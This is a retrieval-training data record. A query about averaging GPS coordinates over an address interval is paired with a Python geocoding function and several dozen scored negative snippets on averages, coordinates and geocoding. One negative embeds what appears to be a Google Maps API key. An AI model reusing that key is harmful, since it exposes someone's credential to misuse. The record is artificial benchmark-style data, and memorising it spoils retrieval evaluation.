query
stringlengths
9
3.4k
document
stringlengths
9
87.4k
metadata
dict
negatives
sequencelengths
4
101
negative_scores
sequencelengths
4
101
document_score
stringlengths
3
10
document_rank
stringclasses
102 values
Gets the average GPS coordinates of the rough address interval
def selective_geocode(rough_address: str) -> dict: lat_results = []; lon_results = [] found = re.findall(r"\d+~\d+", rough_address) if not found: raise geo.AddressError(geo.__name__, rough_address) bound = [int(i) for i in found[0].split('~')] if bound[0] > bound[1]: raise geo.AddressError(geo.__name__, rough_address) interval = int((bound[1] - bound[0] + 1) / settings.GEO_SAMPLES) samples = [i for i in range(bound[0], bound[1] + 1, interval)] for sample in samples: query_address = rough_address.replace(found[0], str(sample)) gps_coordinates = geo.geocode(query_address, culture='zh-TW')["GPS"] if gps_coordinates["lat"] and gps_coordinates["lon"]: lat_results.append(gps_coordinates["lat"]) lon_results.append(gps_coordinates["lon"]) return {"lat": lat_results, "lon": lon_results}
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def gavg(idata):\n\t\n\twgt1=np.cos(np.deg2rad(idata.lat))*(idata*0+1)\n\tga=(wgt1*idata).sum(dim=['lat','lon'])/wgt1.sum(dim=['lat','lon'])\n\n\treturn ga", "def _get_lat_avg(self, report):\n match = re.search(\"\\s*lat\\s*\\((\\w+)\\).*avg\\=\\s*(\\d+\\.{0,1}\\d*)\",\n report)\n if match:\n unit = match.group(1)\n value = float(match.group(2))\n if unit.lower() == \"usec\":\n value = value / 1000\n return value", "def geo_average(self, returns):\r\n return (1 + returns).prod() ** (self.day / len(returns)) - 1", "def mean_average_position():\n pass", "def get_avg_points(self):\n pass", "def average_coords_nt(all_profile_nt: namedtuple) -> tuple:\n \"\"\"Param: all_profile_nt: Named tuple containing all profiles\"\"\"\n x, y = sum(map(lambda t: t[0], map(lambda v: v[4], all_profile_nt)))/len(all_profile_nt), sum(\n map(lambda t: t[1], map(lambda v: v[4], all_profile_nt)))/len(all_profile_nt)\n return x, y", "def average_coords_dc(all_profile_dict: dict) -> tuple:\n \"\"\"Param:all_profile_dc: dictionary containing all profiles\"\"\"\n x, y = sum(map(lambda t: t[0], map(lambda v: v['current_location'], all_profile_dict.values()))) / len(all_profile_dict.values(\n )), sum(map(lambda t: t[1], map(lambda v: v['current_location'], all_profile_dict.values()))) / len(all_profile_dict.values())\n return x, y", "def get_coords(self, address):\n while True:\n try:\n location = self.geolocator.geocode(address) \n break\n except:\n time.sleep(20)\n\n try:\n latitude = location.latitude\n longitude = location.longitude\n except:\n latitude = np.nan\n longitude = np.nan\n\n return((latitude, longitude))", "def avg_pressure(start, end):\n return round((start + end) / 2, 2)", "def average(coords):\n x = 0\n y = 0\n for coord in coords:\n x += coord[0]\n y += coord[1]\n count = len(coords)\n return (x/count, y/count)", "def get_average_neighbors(self,radius):\n return np.mean([agent.n_neighbors(radius) for agent in self.agents])", "def fAvg(H, r):\n p = r[['start_lat', 'start_lng']]\n p.columns = ['lat', 'lng']\n d = r[['end_lat', 'end_lng']]\n d.columns = ['lat', 'lng']\n\n return f(H, p, d).sum()", "def average_point(self, *points):\n length = len(points)\n sum_x = reduce(lambda total, point: total + point[0], points, 0)\n sum_y = reduce(lambda total, point: total + point[1], points, 0)\n return (sum_x/length, sum_y/length)", "def averages(data, bbox):\n\n # load mapbox\n nb, sb, eb, wb = bbox\n G = ox.graph_from_bbox(nb, sb, eb, wb)\n dist = 0.0001\n edges = ox.utils_graph.graph_to_gdfs(G, nodes=False, fill_edge_geometry=True)\n edges['index'] = range(1, len(edges)+1)\n\n all_data = dict()\n for index, row in data.iterrows():\n date = datetime.fromtimestamp(row['time'])\n print(date)\n if date not in all_data:\n all_data[date] = [row]\n else:\n all_data[date].append(row)\n\n rows = []\n for key, value in all_data.items():\n # get closest point on each segment\n lng = value['long']\n lat = data['lat']\n ne, dist = ox.distance.nearest_edges(G, lng, lat, return_dist=True)\n print(ne)\n \n rows.append({\"\"})", "def meanHaversineDistance(lat_sub, lon_sub, lat_real, lon_real):\n return np.mean(HaversineDistance(lat_sub, lon_sub, lat_real, lon_real))", "def _get_average(self):\n norm = 1.0\n for pos, idx in enumerate(self.idx):\n norm *= (self.high[pos] - self.low[pos])\n return 1.0/norm", "def average(self, start, end):\n return self.integrate(start, end) / (end - start)", "def get_position_avg_price(self):\n self.__init_client()\n return float(self.get_position()['entryPrice'])", "def get_average_start_radius(self):\n total_length = len(self.pixel_list)\n\n if not total_length:\n return 0\n elif total_length < 5:\n total_radius = 0\n for i in range(total_length):\n total_radius += self.pixel_list[i].radius\n return total_radius/total_length\n else:\n total_radius = 0\n for i in range(5):\n total_radius += self.pixel_list[i].radius\n return total_radius/5", "def get_avg_range(range_array):\n # Average the ranges\n range_count = 0\n range_accum = 0.0\n\n if range_array:\n # Accumulate the data\n for beam in range(len(range_array)):\n if range_array[beam] > 0.0 and not Ensemble.is_bad_velocity(range_array[beam]):\n range_count += 1\n range_accum += range_array[beam]\n\n if range_count > 0:\n return range_accum / range_count\n else:\n return 0.0", "def generate_average_coord_numbers(self):\n coord_numbers = {}\n for typea in self.atomtypes:\n coord_numbers[znum2sym.z2sym(typea)] = 0\n for typeb in self.atomtypes:\n coord_numbers[znum2sym.z2sym(typea)+'-'+znum2sym.z2sym(typeb)] = 0\n for atom in self.atoms:\n for n in atom.neighs:\n coord_numbers[znum2sym.z2sym(atom.z)] += 1\n coord_numbers[znum2sym.z2sym(atom.z)+'-'+znum2sym.z2sym(n.z)] += 1\n for key in coord_numbers:\n elem = znum2sym.sym2z(key.split('-')[0])\n coord_numbers[key] /= float(self.atomtypes[elem])\n return coord_numbers", "def __calculate_average_distance(self):\n game = self.__game # type: Game\n all_icebergs = game.get_all_icebergs()\n all_icebergs_length = len(all_icebergs)\n sum_distances = 0\n for i in range(all_icebergs_length):\n for j in range(i + 1, all_icebergs_length):\n iceberg1 = all_icebergs[i]\n iceberg2 = all_icebergs[j]\n sum_distances += iceberg1.get_turns_till_arrival(iceberg2)\n\n return sum_distances / (all_icebergs_length * (all_icebergs_length - 1) / 2)", "def get_coordinates_from_address(address):\n \n geolocator = Nominatim(user_agent=\"NAIP\")\n location = geolocator.geocode(address)\n print('Retrieving location for address:\\n{}'.format(location.address))\n return location.latitude, location.longitude", "def avg_equivlat(in_field, pv_field, n_lon, n_lat):\n # constants\n PI = np.pi\n\n # grid characteristics\n n_grid = int(n_lon)*int(n_lat)\n phi = PI/n_lat\n phih = 0.5*PI - phi*np.arange(n_lat+1)\n\n area_field = np.zeros([n_lon, n_lat])\n for j in range(n_lat):\n area_field[:, j] = 2*PI*(np.sin(phih[j]) - np.sin(phih[j+1]))/n_lon\n\n # reorder the fields\n ord_ind = np.argsort(pv_field, axis=None)[::-1]\n infield_ordered = in_field.flatten()[ord_ind]\n pv_ordered = pv_field.flatten()[ord_ind]\n area_ordered = area_field.flatten()[ord_ind]\n\n # areas of equivalent latitude bands for output\n # sum area along latitude bands\n area_band = np.sum(area_field, axis = 0)\n infield_eq = np.zeros(n_lat)\n\n ll = 0\n area_now = 0.0\n infield_tot = 0.0\n\n # loop to average in equivalent latitude bands\n for nn in range(n_grid):\n area_now += area_ordered[nn]\n infield_tot += area_ordered[nn]*infield_ordered[nn]\n if (area_now >= area_band[ll] or (nn == n_grid-1)):\n infield_tot -= (area_now - area_band[ll])*infield_ordered[nn]\n infield_eq[ll] = infield_tot/area_band[ll]\n infield_tot = (area_now - area_band[ll])*infield_ordered[nn]\n area_now -= area_band[ll]\n ll += 1\n \n # in field is averaged along eq. latitude bands from 90N - 90S\n # legacy from times when we were mostly interested in NH \n lat = PI/2 - np.arange(n_lat)*phi \n return (lat, infield_eq)", "def get_mean_radius(self):\n\n radius = np.array(self.coord_list)\n radius[:, 0] -= self.mean_pos[0]\n radius[:, 1] -= self.mean_pos[1]\n radius = np.sqrt(np.sum(radius ** 2, axis=1))\n mean_radius = np.mean(radius)\n return mean_radius", "def average_distance(self):\r\n total = 0\r\n edges = 0\r\n for code, _list in self.edges.items():\r\n for edge in _list:\r\n total += edge.distance\r\n edges += 1\r\n return total / edges", "def streets_per_node_avg(G):\n spn_vals = streets_per_node(G).values()\n return sum(spn_vals) / len(G.nodes)", "def mean_radius(self):\n return self._mean_radius", "def get_network_average_position(self):\n # the total number of nodes in the network\n num_nodes = self.total_nodes()\n\n # get the location of all nodes\n all_nodes = np.empty((num_nodes, R_space))\n for index, item in enumerate(self.nodes.values()):\n\n all_nodes[index] = item.get_position()\n\n # get the sum of all of the positions along space dim and divide by the number of nodes\n average_position = np.sum(all_nodes, axis=0) / num_nodes\n\n return average_position", "def mean_lon_of_perigee(jd):\n T = (jd - jd1950) / 36525.0\n\n p = (0.012, 1.65, 6190.67, 1015489.951)\n\n return np.polyval(p, T) / 3600.0", "def get_mean(self):\n mean = np.array(np.zeros((4,8)))\n for i,c in enumerate(self.cellLines):\n for j,l in enumerate(self.ligands):\n mean[i][j] = self.aucs[c][l]['mean']\n return mean", "def get_average_end_radius(self):\n total_length = len(self.pixel_list)\n\n if not total_length:\n return 0\n elif total_length < 5:\n total_radius = 0\n for i in range(total_length):\n total_radius += self.pixel_list[i].radius\n return total_radius/total_length\n else:\n total_radius = 0\n for i in range(total_length-5, total_length):\n total_radius += self.pixel_list[i].radius\n return total_radius/5", "def get_average(points):\n x = mean([p[0] for p in points])\n y = mean([p[1] for p in points])\n return x, y", "def averageDominationCount(leaf):\n averageDominationCount = np.nanmean(leaf.calDominationCount())\n return averageDominationCount", "def average(cls, points):\n return Point.sum(points) / len(points)", "def center(coords):\n for c in coords:\n if 'avg' not in locals():\n avg = c\n else:\n avg += c\n return avg / len(coords)", "def _get_mean(self):\n return (0.485, 0.456, 0.406)", "def geo(address):\n API_PRIVATE = os.environ.get(\"TOM_TOM_PRIVATE\")\n encoded = urllib.parse.quote(address)\n query ='https://api.tomtom.com/search/2/geocode/' + str(encoded) + \\\n '.json?limit=1&countrySet=US&lat=42&lon=-72&topLeft=42.886%2C%20-73.508&btmRight=41.237%2C-69.928&key=' \\\n + API_PRIVATE\n\n response = requests.get(query)\n while True:\n try:\n jsonResponse = response.json()\n break\n except:\n response = requests.get(query)\n\n latit = 0\n longit = 0\n\n for address in jsonResponse['results']:\n latit = address['position']['lat']\n longit = address['position']['lon']\n return latit, longit", "def get_average_dist_to_tok_start_and_end(doc_span, tok_start_position, tok_end_position):\n center_answer = (tok_start_position + tok_end_position) // 2\n dist_to_start = abs(doc_span.start - center_answer)\n dist_to_end = abs(doc_span.start + doc_span.length - 1 - center_answer)\n return (dist_to_start + dist_to_end) // 2", "def average(self):\n return (self.current + self.last) / 2.0", "def get_average(self, s_freq, e_freq):\n s_ind = self.get_bin(s_freq)\n e_ind = self.get_bin(e_freq)\n lst = self.mags[s_ind:e_ind+1]\n try:\n avg = sum(lst)/len(lst)\n except:\n print(s_ind, e_ind)\n print('werid stuff')\n avg = 0\n return avg", "def mean(self) -> float:\n return self._interval_sum / len(self.intervals)", "def average(x, y):\n #helper function for get_accuracy\n average = (x+y)/2 \n return average", "def get_lat_long(address):\n url = \"https://maps.googleapis.com/maps/api/geocode/json\"\n params = {'address':address,'key':'AIzaSyBVZhQwm7GZViRzTCuH1VBvMdIpLMwvfT4'}\n req = requests.get(url,params=params)\n stat = req.status_code\n latitude = req.json()['results'][0]['geometry']['location']['lat']\n longitude = req.json()['results'][0]['geometry']['location']['lng']\n return latitude, longitude", "def spatial_avg(self, input_layer):\n return tf.reduce_mean(input_layer, [2, 3], name='spatial_avg')", "def find_average(self):\n df = self.find_top_seven_routes()\n # Find the total of the frequency of the top 7 traveled routes\n total =df.sort_values('Frequency', ascending=False).Frequency[:7].sum()\n # Calculate the average by dividing each frequency by the total\n df['average'] = df['Frequency'] / total\n\n return df", "def _avg_sample(self):\n samples = [0] * self.num_samples\n for i in range(self.num_samples):\n samples[i] = self.sensor.measure_distance()\n time.sleep(self.sample_delay)\n if self.drop_extremes:\n samples.sort()\n samples = samples[1:-1]\n return sum(samples) / len(samples)", "def point_avg(points):\n if len(points)==1:\n new_center= np.mean(points)\n else:\n new_center= [np.mean([x[y] for x in points]) for y in range(len(points[0]))]\n return new_center", "def get_agl(coordinate):\n level, lat, lon = coordinate\n asl_hgt = ((ph.isel(bottom_top_stag=level, south_north=lat, west_east=lon) +\\\n ph.isel(bottom_top_stag=level+1, south_north=lat, west_east=lon))/2) +\\\n ((phb.isel(bottom_top_stag=level, south_north=lat, west_east=lon) +\\\n phb.isel(bottom_top_stag=level+1, south_north=lat, west_east=lon))/2) \\\n / GRAVITY\n agl_hgt = asl_hgt - hgt.isel(south_north=lat, west_east=lon)\n\n return (level, lat, lon, float(agl_hgt.values))", "def get_average(self):\n self.avg = math.floor((self.maths + self.phy + self.che) / 3, )\n self.assign_grade()\n return self.avg\n # End of method get_average", "def get_coord_from_address(code_postal, adresse=None):\n headers = {\"Content-Type\": \"application/json\"}\n if adresse != None:\n url = str((\"http://api-adresse.data.gouv.fr/search/?q=\" + str(adresse) + \"&postcode=\" + str(code_postal)))\n else:\n url = str((\"http://api-adresse.data.gouv.fr/search/?q=\" + str(code_postal)))\n print(url)\n r = requests.get(url, headers=headers, data=\"\")\n js = json.loads(r.text)\n if code_postal == 75001:\n x = js['features'][1]['geometry']['coordinates']\n else:\n \tx = js['features'][0]['geometry']['coordinates']\n longitude = x[0]\n latitude = x[1]\n pos = []\n pos.append(longitude)\n pos.append(latitude)\n print(pos)\n return pos", "def get_avg_around_pix(x0, y0, arr):\n x, y = [x0], [y0]\n if x0 > 0:\n x.append(x0 - 1)\n if arr.shape[0] - 1 > x0:\n x.append(x0 + 1)\n if y0 > 0:\n y.append(y0 - 1)\n if arr.shape[1] - 1 > y0:\n y.append(y0 + 1)\n neighb = [arr[i][j] for i in x for j in y]\n avg = np.mean(neighb)\n return avg", "def find_area(self):\n min_lat_point = self.latitude_min\n max_lat_point = self.latitude_max\n min_lon_point = self.longitude_min\n max_lon_point = self.longitude_max\n self.rename_latitude()\n self.rename_longitude()\n all_lat_bounds = self.cube.coord('latitude').bounds\n all_lon_bounds = self.cube.coord('longitude').bounds\n # print(all_lat_bounds)\n # print(all_lon_bounds)\n for i, lat in enumerate(all_lat_bounds):\n for j, lon in enumerate(all_lon_bounds):\n lat_bounds = lat # 2D array of the lower and upper lat bounds\n lon_bounds = lon # 2D array of the lower and upper lon bounds\n if lat_bounds[0] <= min_lat_point < lat_bounds[1]:\n if lon_bounds[0] <= min_lon_point < lon_bounds[1]:\n nlat_min = i\n nlon_min = j\n else:\n pass\n else:\n pass\n\n for k, lat in enumerate(all_lat_bounds):\n for l, lon in enumerate(all_lon_bounds):\n lat_bounds = lat # 2D array of the lower and upper lat bounds\n lon_bounds = lon # 2D array of the lower and upper lon bounds\n if lat_bounds[0] <= max_lat_point < lat_bounds[1]:\n if lon_bounds[0] <= max_lon_point < lon_bounds[1]:\n nlat_max = k\n nlon_max = l\n else:\n pass\n else:\n pass\n\n area_subset = self.cube[:, nlat_min:nlat_max+1, nlon_min:nlon_max+1]\n # print(area_subset.coord('latitude').points)\n # print(area_subset.coord('longitude').points)\n area_mean = area_subset.collapsed(['latitude', 'longitude'],\n iris.analysis.MEAN)\n\n return area_mean", "def avg_bp_from_range(self, bp):\n \n if '-' in bp:\n maxlen = float(bp.split(\"-\",1)[1])\n minlen = float(bp.split(\"-\",1)[0])\n bp = ((maxlen - minlen)/2) + minlen\n return(int(bp))", "def avg(x, y):\n return (x + y)/2", "def get_average(self, *dims):\n p = self.get_points(*dims)\n ret = np.average(p, axis=0)\n if ret.size == 1:\n return ret[0]\n return ret", "def _avg_bp_from_range(self, bp):\n # copied from multiqc v1.6\n\n try:\n if \"-\" in bp:\n maxlen = float(bp.split(\"-\", 1)[1])\n minlen = float(bp.split(\"-\", 1)[0])\n bp = ((maxlen - minlen) / 2) + minlen\n except TypeError:\n pass\n return int(bp)", "def geo_mean(num_list):\n np_array = np.array(num_list)\n return np_array.prod() ** (1.0 / len(np_array))", "def coordExtrema(a):\n # Extreme values of longitude and latitude in the survey.\n longiMin = sp.inf\n latMin = sp.inf\n longiMax = -sp.inf\n latMax = -sp.inf\n for t in range(len(a)):\n if a[t].pktCount > 0:\n arraMin = sp.amin(a[t].longi)\n if arraMin < longiMin:\n longiMin = sp.amin(a[t].longi)\n arraMin = sp.amin(a[t].lat)\n if arraMin < latMin:\n latMin = arraMin\n arraMax = sp.amax(a[t].longi)\n if arraMax > longiMax:\n longiMax = arraMax\n arraMax = sp.amax(a[t].lat)\n if arraMax > latMax:\n latMax = arraMax\n\n ext = cs.emptyClass()\n ext.longiMin = longiMin\n ext.longiMax = longiMax\n ext.latMin = latMin\n ext.latMax = latMax\n return ext", "def bounds(address):\n endpoint = 'http://maps.googleapis.com/maps/api/geocode/json'\n sensor = 'true'\n try:\n query_string = urllib.urlencode(OrderedDict(address=address, sensor=sensor))\n url = \"%s?%s\" % (endpoint, query_string)\n res = urllib.urlopen(url)\n data = res.read()\n d = json.loads(data)\n if 'results' in d:\n for r in d['results']:\n name = None\n if 'formatted_address' in r:\n name = r['formatted_address']\n if 'geometry' in r:\n if 'bounds' in r['geometry']:\n bounds = r['geometry']['bounds']\n ne = bounds['northeast']\n sw = bounds['southwest']\n bnds = [sw['lng'], ne['lat'], ne['lng'], sw['lat']]\n print \"%s \\n%s\" % (name, ','.join([str(b) for b in bnds]))\n except IOError:\n print sys.stderr, 'Could not open URL.'", "def create_locs(address):\r\n geolocator = Nominatim(user_agent = 'SF_Parking_EDA')\r\n try:\r\n location = geolocator.geocode(address, timeout = 10)\r\n except:\r\n location = None\r\n time.sleep(1)\r\n\r\n if location != None and check_location(location):\r\n return (location.latitude, location.longitude )\r\n else:\r\n return None", "def get_average_measurements_for_area(area_id):\n locations = db_access.get_locations_for_area(area_id)\n\n if len(locations) == 0:\n return None\n else:\n return_table = []\n for i in locations:\n for k in db_access.get_measurements_for_location(i[0]):\n return_table.append(k[1])\n return mean(return_table)", "def get_mean_point_response(self): # pragma: no cover\n pass", "def average_speed(self):\n return self.total_distance * 3600 / self.total_time", "def _get_average_mapping(percentiles_database):\n # Assuming percentiles_database.shape == (num_data_points, num_percentiles)\n pc1 = percentiles_database[:, 0]\n pc2 = percentiles_database[:, -1]\n s1, s2 = STANDARD_RANGE\n slopes = (s2 - s1) / (pc2 - pc1)\n slopes = np.nan_to_num(slopes)\n intercepts = np.mean(s1 - slopes * pc1)\n num_images = len(percentiles_database)\n final_map = slopes.dot(percentiles_database) / num_images + intercepts\n return final_map", "def get_geocode(self, address):\n\n try:\n raw_data = self.__get_raw_data(address)\n except (URLError, ValueError):\n return 503, None\n else:\n code, coords = self.__parse_raw_data(raw_data)\n return code, coords", "def get_bounds(self):\n\n northing=self.f.variables['y']\n easting=self.f.variables['x']\n\n lat1,lon1 = utm.to_latlon(np.min(easting),np.min(northing),11,northern=True)\n lat2,lon2 = utm.to_latlon(np.max(easting),np.max(northing),11,northern=True)\n\n return (lon1,lon2,lat1,lat2)", "def get_average(self) -> float:\n return sum(self._scores) / len(self._scores)", "def geocode(address):\n\n mapsurl = ('http://maps.googleapis.com/maps/api/geocode/xml?address=' +\n address.replace(' ', '+') + '&sensor=false')\n\n coords = urllib.urlopen(mapsurl).read()\n root = etree.fromstring(coords)\n coordstr = (0, 0)\n loc = root.find(\".//location\")\n if not loc is None:\n coordstr = (loc[1].text, loc[0].text)\n return coordstr", "def _get_clat_avg(self, report):\n match = re.search(\".*clat\\s*\\((\\w+)\\).*avg\\=\\s*(\\d+\\.{0,1}\\d*)\",\n report)\n if match:\n unit = match.group(1)\n value = float(match.group(2))\n if unit.lower() == \"usec\":\n value = value / 1000\n return value", "def get_average_energy(audio, beats, begin, end):\n buffer = np.square(audio[int(beats[int(begin)]):int(beats[int(end)])])\n average = np.mean(buffer)\n return average", "def get_mean_offset(a, b):\n off = np.abs(a - b)\n return np.sum(off) / b.sum()", "def avg(self):\n return sum(self.times) / len(self.times)", "def avg(self):\n return sum(self.times) / len(self.times)", "def avg(self):\n return sum(self.times) / len(self.times)", "def avg_temps(self):\r\n average_temp = 0\r\n for j in range(len(self.trip)):\r\n average_temp += self.trip[j].get_temperature(j)\r\n average_temp /= len(self.trip)\r\n return average_temp", "def area_average(cube, region):\n \n # Specify the latitudes and longitudes starting from the smallest number to largest or in latitude and longitude from south to north and east to west\n lon1, lon2, lat1, lat2 = region[0], region[1], region[2], region[3] \n # Then intersect the data at these points\n cube = cube.intersection(longitude=(lon1, lon2),latitude=(lat1, lat2))\n\n #cube.coord('latitude').guess_bounds()\n #cube.coord('longitude').guess_bounds()\n\n # area weighting\n weights = iris.analysis.cartography.area_weights(cube)\n # Average that area by latitude and longitudes by the weighted mean\n cube = cube.collapsed(['latitude','longitude'], iris.analysis.MEAN, weights=weights)\n\n return cube", "def average_grad(self):\n\n # Compute the respective gradients\n grad_line_1 = self.gradient(0,1)\n grad_line_2 = self.gradient(2,3)\n\n a1 = np.abs(np.arctan(grad_line_1))\n a2 = np.abs(np.arctan(grad_line_2))\n\n ave_grad = np.tan((a1+a2)/2)\n\n #ave_grad = np.average([grad_line_1,grad_line_2]) # Compute the average gradient\n\n return ave_grad", "def mean_absolute_percentage_error(groundtruth, predictions):\n gt = np.array(groundtruth)\n pred = np.array(predictions)\n errors = np.abs(pred - gt)\n averages = (np.abs(gt) + np.abs(pred)) / 2.0\n return 100.0 * np.mean(errors / averages)", "def meanZmArea(self):\n sumArea = 0\n for site in self.sites:\n sumArea = sumArea + site.siteZmArea\n meanArea = sumArea / self.countSites()\n return meanArea", "def _sum_over_lat_lon(arr):\n return arr.sum(internal_names.LAT_STR).sum(internal_names.LON_STR)", "def centered_average(nums):\n maxvalue = nums[0]\n minvalue = nums[0]\n sum = 0\n for x in nums:\n maxvalue = max(maxvalue, x)\n minvalue = min(minvalue, x)\n sum += x\n return (sum - maxvalue - minvalue) / (len(nums) - 2)", "def calcApproxDist(lon1, lat1, lon2, lat2):\n\n import math\n from shapely.geometry import Point\n\n if lat1 == lat2 and lon1 == lon2:\n return 0.0\n\n point1 = Point(lon1,lat1)\n point2 = Point(lon2, lat2)\n\n return math.acos(math.sin(math.radians(point1.y))*math.sin(math.radians(point2.y))+math.cos(math.radians(\n point1.y))*math.cos(math.radians(point2.y))*math.cos(math.radians(point2.x)-math.radians(point1.x)))*6371", "def gmrae(self, benchmark: np.ndarray = None) -> float:\n return _geometric_mean(np.abs(self._relative_error(benchmark)))", "def average_fitness(self):\n return sum([e.fitness for e in self.population]) / len(self.population)", "def coldaverage( names):\n\n rs = radioastronomy.Spectrum() # create input and average structures\n avenames = names # create an output list to average\n\n# assume only a limited range of galactic latitudes are available\n# not range above +/-60.\n use60Range = False\n minGlat = 90. # initialize to extremea\n maxGlat = -90.\n maxEl = -90.\n minEl = 90.\n ncold = 0\n\n # for all input files\n for filename in names:\n\n parts = filename.split('/')\n nparts = len(parts)\n if nparts == 1:\n aname = parts[0]\n else:\n aname = parts[nparts-1]\n\n parts = aname.split('.')\n nparts = len(parts)\n if nparts < 2:\n print 'File is not an astronomy file: ',filename\n continue\n else:\n extension = parts[nparts-1]\n\n extension = extension.upper()\n if extension != 'AST': # speed up by only looking at astronomy files\n continue\n \n rs.read_spec_ast(filename) # An observation, read values\n\n if rs.telel < 0: # only working with observations, skip elevation <= 0.\n continue\n\n maxGlat = max( rs.gallat, maxGlat)\n minGlat = min( rs.gallat, minGlat)\n maxEl = max( rs.telel, maxEl)\n minEl = min( rs.telel, minEl)\n # end for all files loop, looking for max el and latitude ranges\n\n # if any high galactic latitudes, use only above +/-60d \n if minGlat < -60. or maxGlat > 60.:\n minGlat = -60.\n maxGlat = 60.\n else: # else no high galactic latitude data\n # use highest galactic latitudes - +/-5.degrees\n if -minGlat > maxGlat: # if negative latitudes higher\n minGlat = minGlat + 5.\n maxGlat = 90.\n else: # else positive latitudes higher\n maxGlat = maxGlat - 5.\n minGlat = -90.\n\n # only use the elevations above 60 degrees, if any\n if maxEl > 60.:\n maxEl = 60.\n else:\n maxEl = maxEl - 10. #else must use highest elevations available\n\n # now average coldest data for calibration\n for filename in names:\n\n rs.read_spec_ast(filename)\n rs.azel2radec() # compute ra,dec from az,el\n\n if rs.telel < maxEl:\n continue\n\n if rs.gallat > maxGlat or rs.gallat < minGlat:\n avenames[ncold] = filename\n ncold = ncold + 1\n # end of for all files loop\n\n ncold, cold = average( avenames[0:ncold]) # now use generic program for averages\n if ncold < 1:\n print 'No Cold load files; can not calibrate!'\n exit()\n\n return ncold, cold, minEl, maxEl", "def getArea(self):\n seg = self._group_index\n groups = np.unique(seg)\n ng = len(groups)\n area = 0\n for i in range(ng):\n group_segments = np.where(groups[i] == seg)[0]\n nseg = len(group_segments) - 1\n for j in range(nseg):\n ind = group_segments[j]\n p0 = latlon2ecef(self._toplats[ind],\n self._toplons[ind],\n self._topdeps[ind])\n p1 = latlon2ecef(self._toplats[ind + 1],\n self._toplons[ind + 1],\n self._topdeps[ind + 1])\n p2 = latlon2ecef(self._botlats[ind + 1],\n self._botlons[ind + 1],\n self._botdeps[ind + 1])\n p3 = latlon2ecef(self._botlats[ind],\n self._botlons[ind],\n self._botdeps[ind])\n a = np.sqrt((p1[0] - p0[0])**2 +\n (p1[1] - p0[1])**2 +\n (p1[2] - p0[2])**2)\n b = np.sqrt((p2[0] - p0[0])**2 +\n (p2[1] - p0[1])**2 +\n (p2[2] - p0[2])**2)\n c = np.sqrt((p2[0] - p1[0])**2 +\n (p2[1] - p1[1])**2 +\n (p2[2] - p1[2])**2)\n s = (a + b + c) / 2\n A1 = np.sqrt(s * (s - a) * (s - b) * (s - c))\n a = np.sqrt((p0[0] - p3[0])**2 +\n (p0[1] - p3[1])**2 +\n (p0[2] - p3[2])**2)\n b = np.sqrt((p2[0] - p3[0])**2 +\n (p2[1] - p3[1])**2 +\n (p2[2] - p3[2])**2)\n c = np.sqrt((p0[0] - p2[0])**2 +\n (p0[1] - p2[1])**2 +\n (p0[2] - p2[2])**2)\n s = (a + b + c) / 2\n A2 = np.sqrt(s * (s - a) * (s - b) * (s - c))\n area = area + (A1 + A2) / 1000 / 1000\n return area", "def get_map(self):\n average_precisions = []\n \n for query, answer in tqdm(zip(self.test_queries, self.results)):\n correct_set = self.correct_answers[query]\n average_precision = 0\n n_relevant = 0\n for i, candidate in enumerate(answer):\n if candidate in correct_set:\n n_relevant += 1\n average_precision += (n_relevant / (i + 1))\n average_precision /= len(correct_set)\n average_precisions.append(average_precision)\n \n return np.mean(average_precisions)", "def find_stop_near(address):\n latlong = get_lat_long(address)\n latitude = latlong[0]\n longitude = latlong[1]\n nearStop = get_nearest_station(latitude, longitude)\n return nearStop", "def _get_mean_pole(self, coord):\n version = config.tech.mean_pole_version.str\n key = coord + \"_\" + str(version)\n if key not in self._mean_pole_cache:\n mean_xp = np.empty(self.time.size)\n mean_yp = np.empty(self.time.size)\n # Calculate correction\n for obs, time in enumerate(self.time.tt):\n # Equation (7.25) IERS Conventions 2010\n mean_xp[obs], mean_yp[obs], _ = iers.iers_cmp_2015(version, time.jyear)\n self._mean_pole_cache[\"x_\" + str(version)] = mean_xp\n self._mean_pole_cache[\"y_\" + str(version)] = mean_yp\n return self._mean_pole_cache[key]", "def get_average(data):\n average = sum(data) / len(data)\n\n return average", "def avgtime(self):\n return (self._total_time['value'] / 1000) / self._total_time['count'] if self._total_time['count'] else 0", "def _avg(cls, l):\n\n return sum(l) / float(len(l))", "def getLatAndLong(addr):\n\ttry:\n\t\tlocation = geolocator.geocode(addr, timeout = 2)\n\n\t\tprint (location.latitude, location.longitude)\n\t\treturn (location.latitude, location.longitude)\n\texcept Exception, e:\n\t\tprint e\n\t\treturn None", "def average_consensus(self, cluster):\n\t\tcenterk = 0\n\t\tindex = 0\n\t\tfor value in cluster:\n\t\t\tcenterk += value\n\t\t\tindex += 1\n\t\tcenterk = centerk / index\n\t\treturn centerk", "def get_average_torsion (phis) :\n shift = phis[0]\n phis_shifted = get_diffvec(phis,shift)\n avg_shifted = phis_shifted.sum()/len(phis)\n average = avg_shifted + shift\n return average", "def get_average_torsion (phis) :\n shift = phis[0]\n phis_shifted = get_diffvec(phis,shift)\n avg_shifted = phis_shifted.sum()/len(phis)\n average = avg_shifted + shift\n return average", "def geo_mean(array):\n logsum = sum([np.log(each) for each in array])/len(array)\n return np.exp(logsum)", "def time_segments_average(X, interval, time_column):\n warnings.warn(_TIME_SEGMENTS_AVERAGE_DEPRECATION_WARNING, DeprecationWarning)\n\n if isinstance(X, np.ndarray):\n X = pd.DataFrame(X)\n\n X = X.sort_values(time_column).set_index(time_column)\n\n start_ts = X.index.values[0]\n max_ts = X.index.values[-1]\n\n values = list()\n index = list()\n while start_ts <= max_ts:\n end_ts = start_ts + interval\n subset = X.loc[start_ts:end_ts - 1]\n means = subset.mean(skipna=True).values\n values.append(means)\n index.append(start_ts)\n start_ts = end_ts\n\n return np.asarray(values), np.asarray(index)", "def get_mean(self):\n return numpy.mean(self._x) - numpy.mean(self._y)" ]
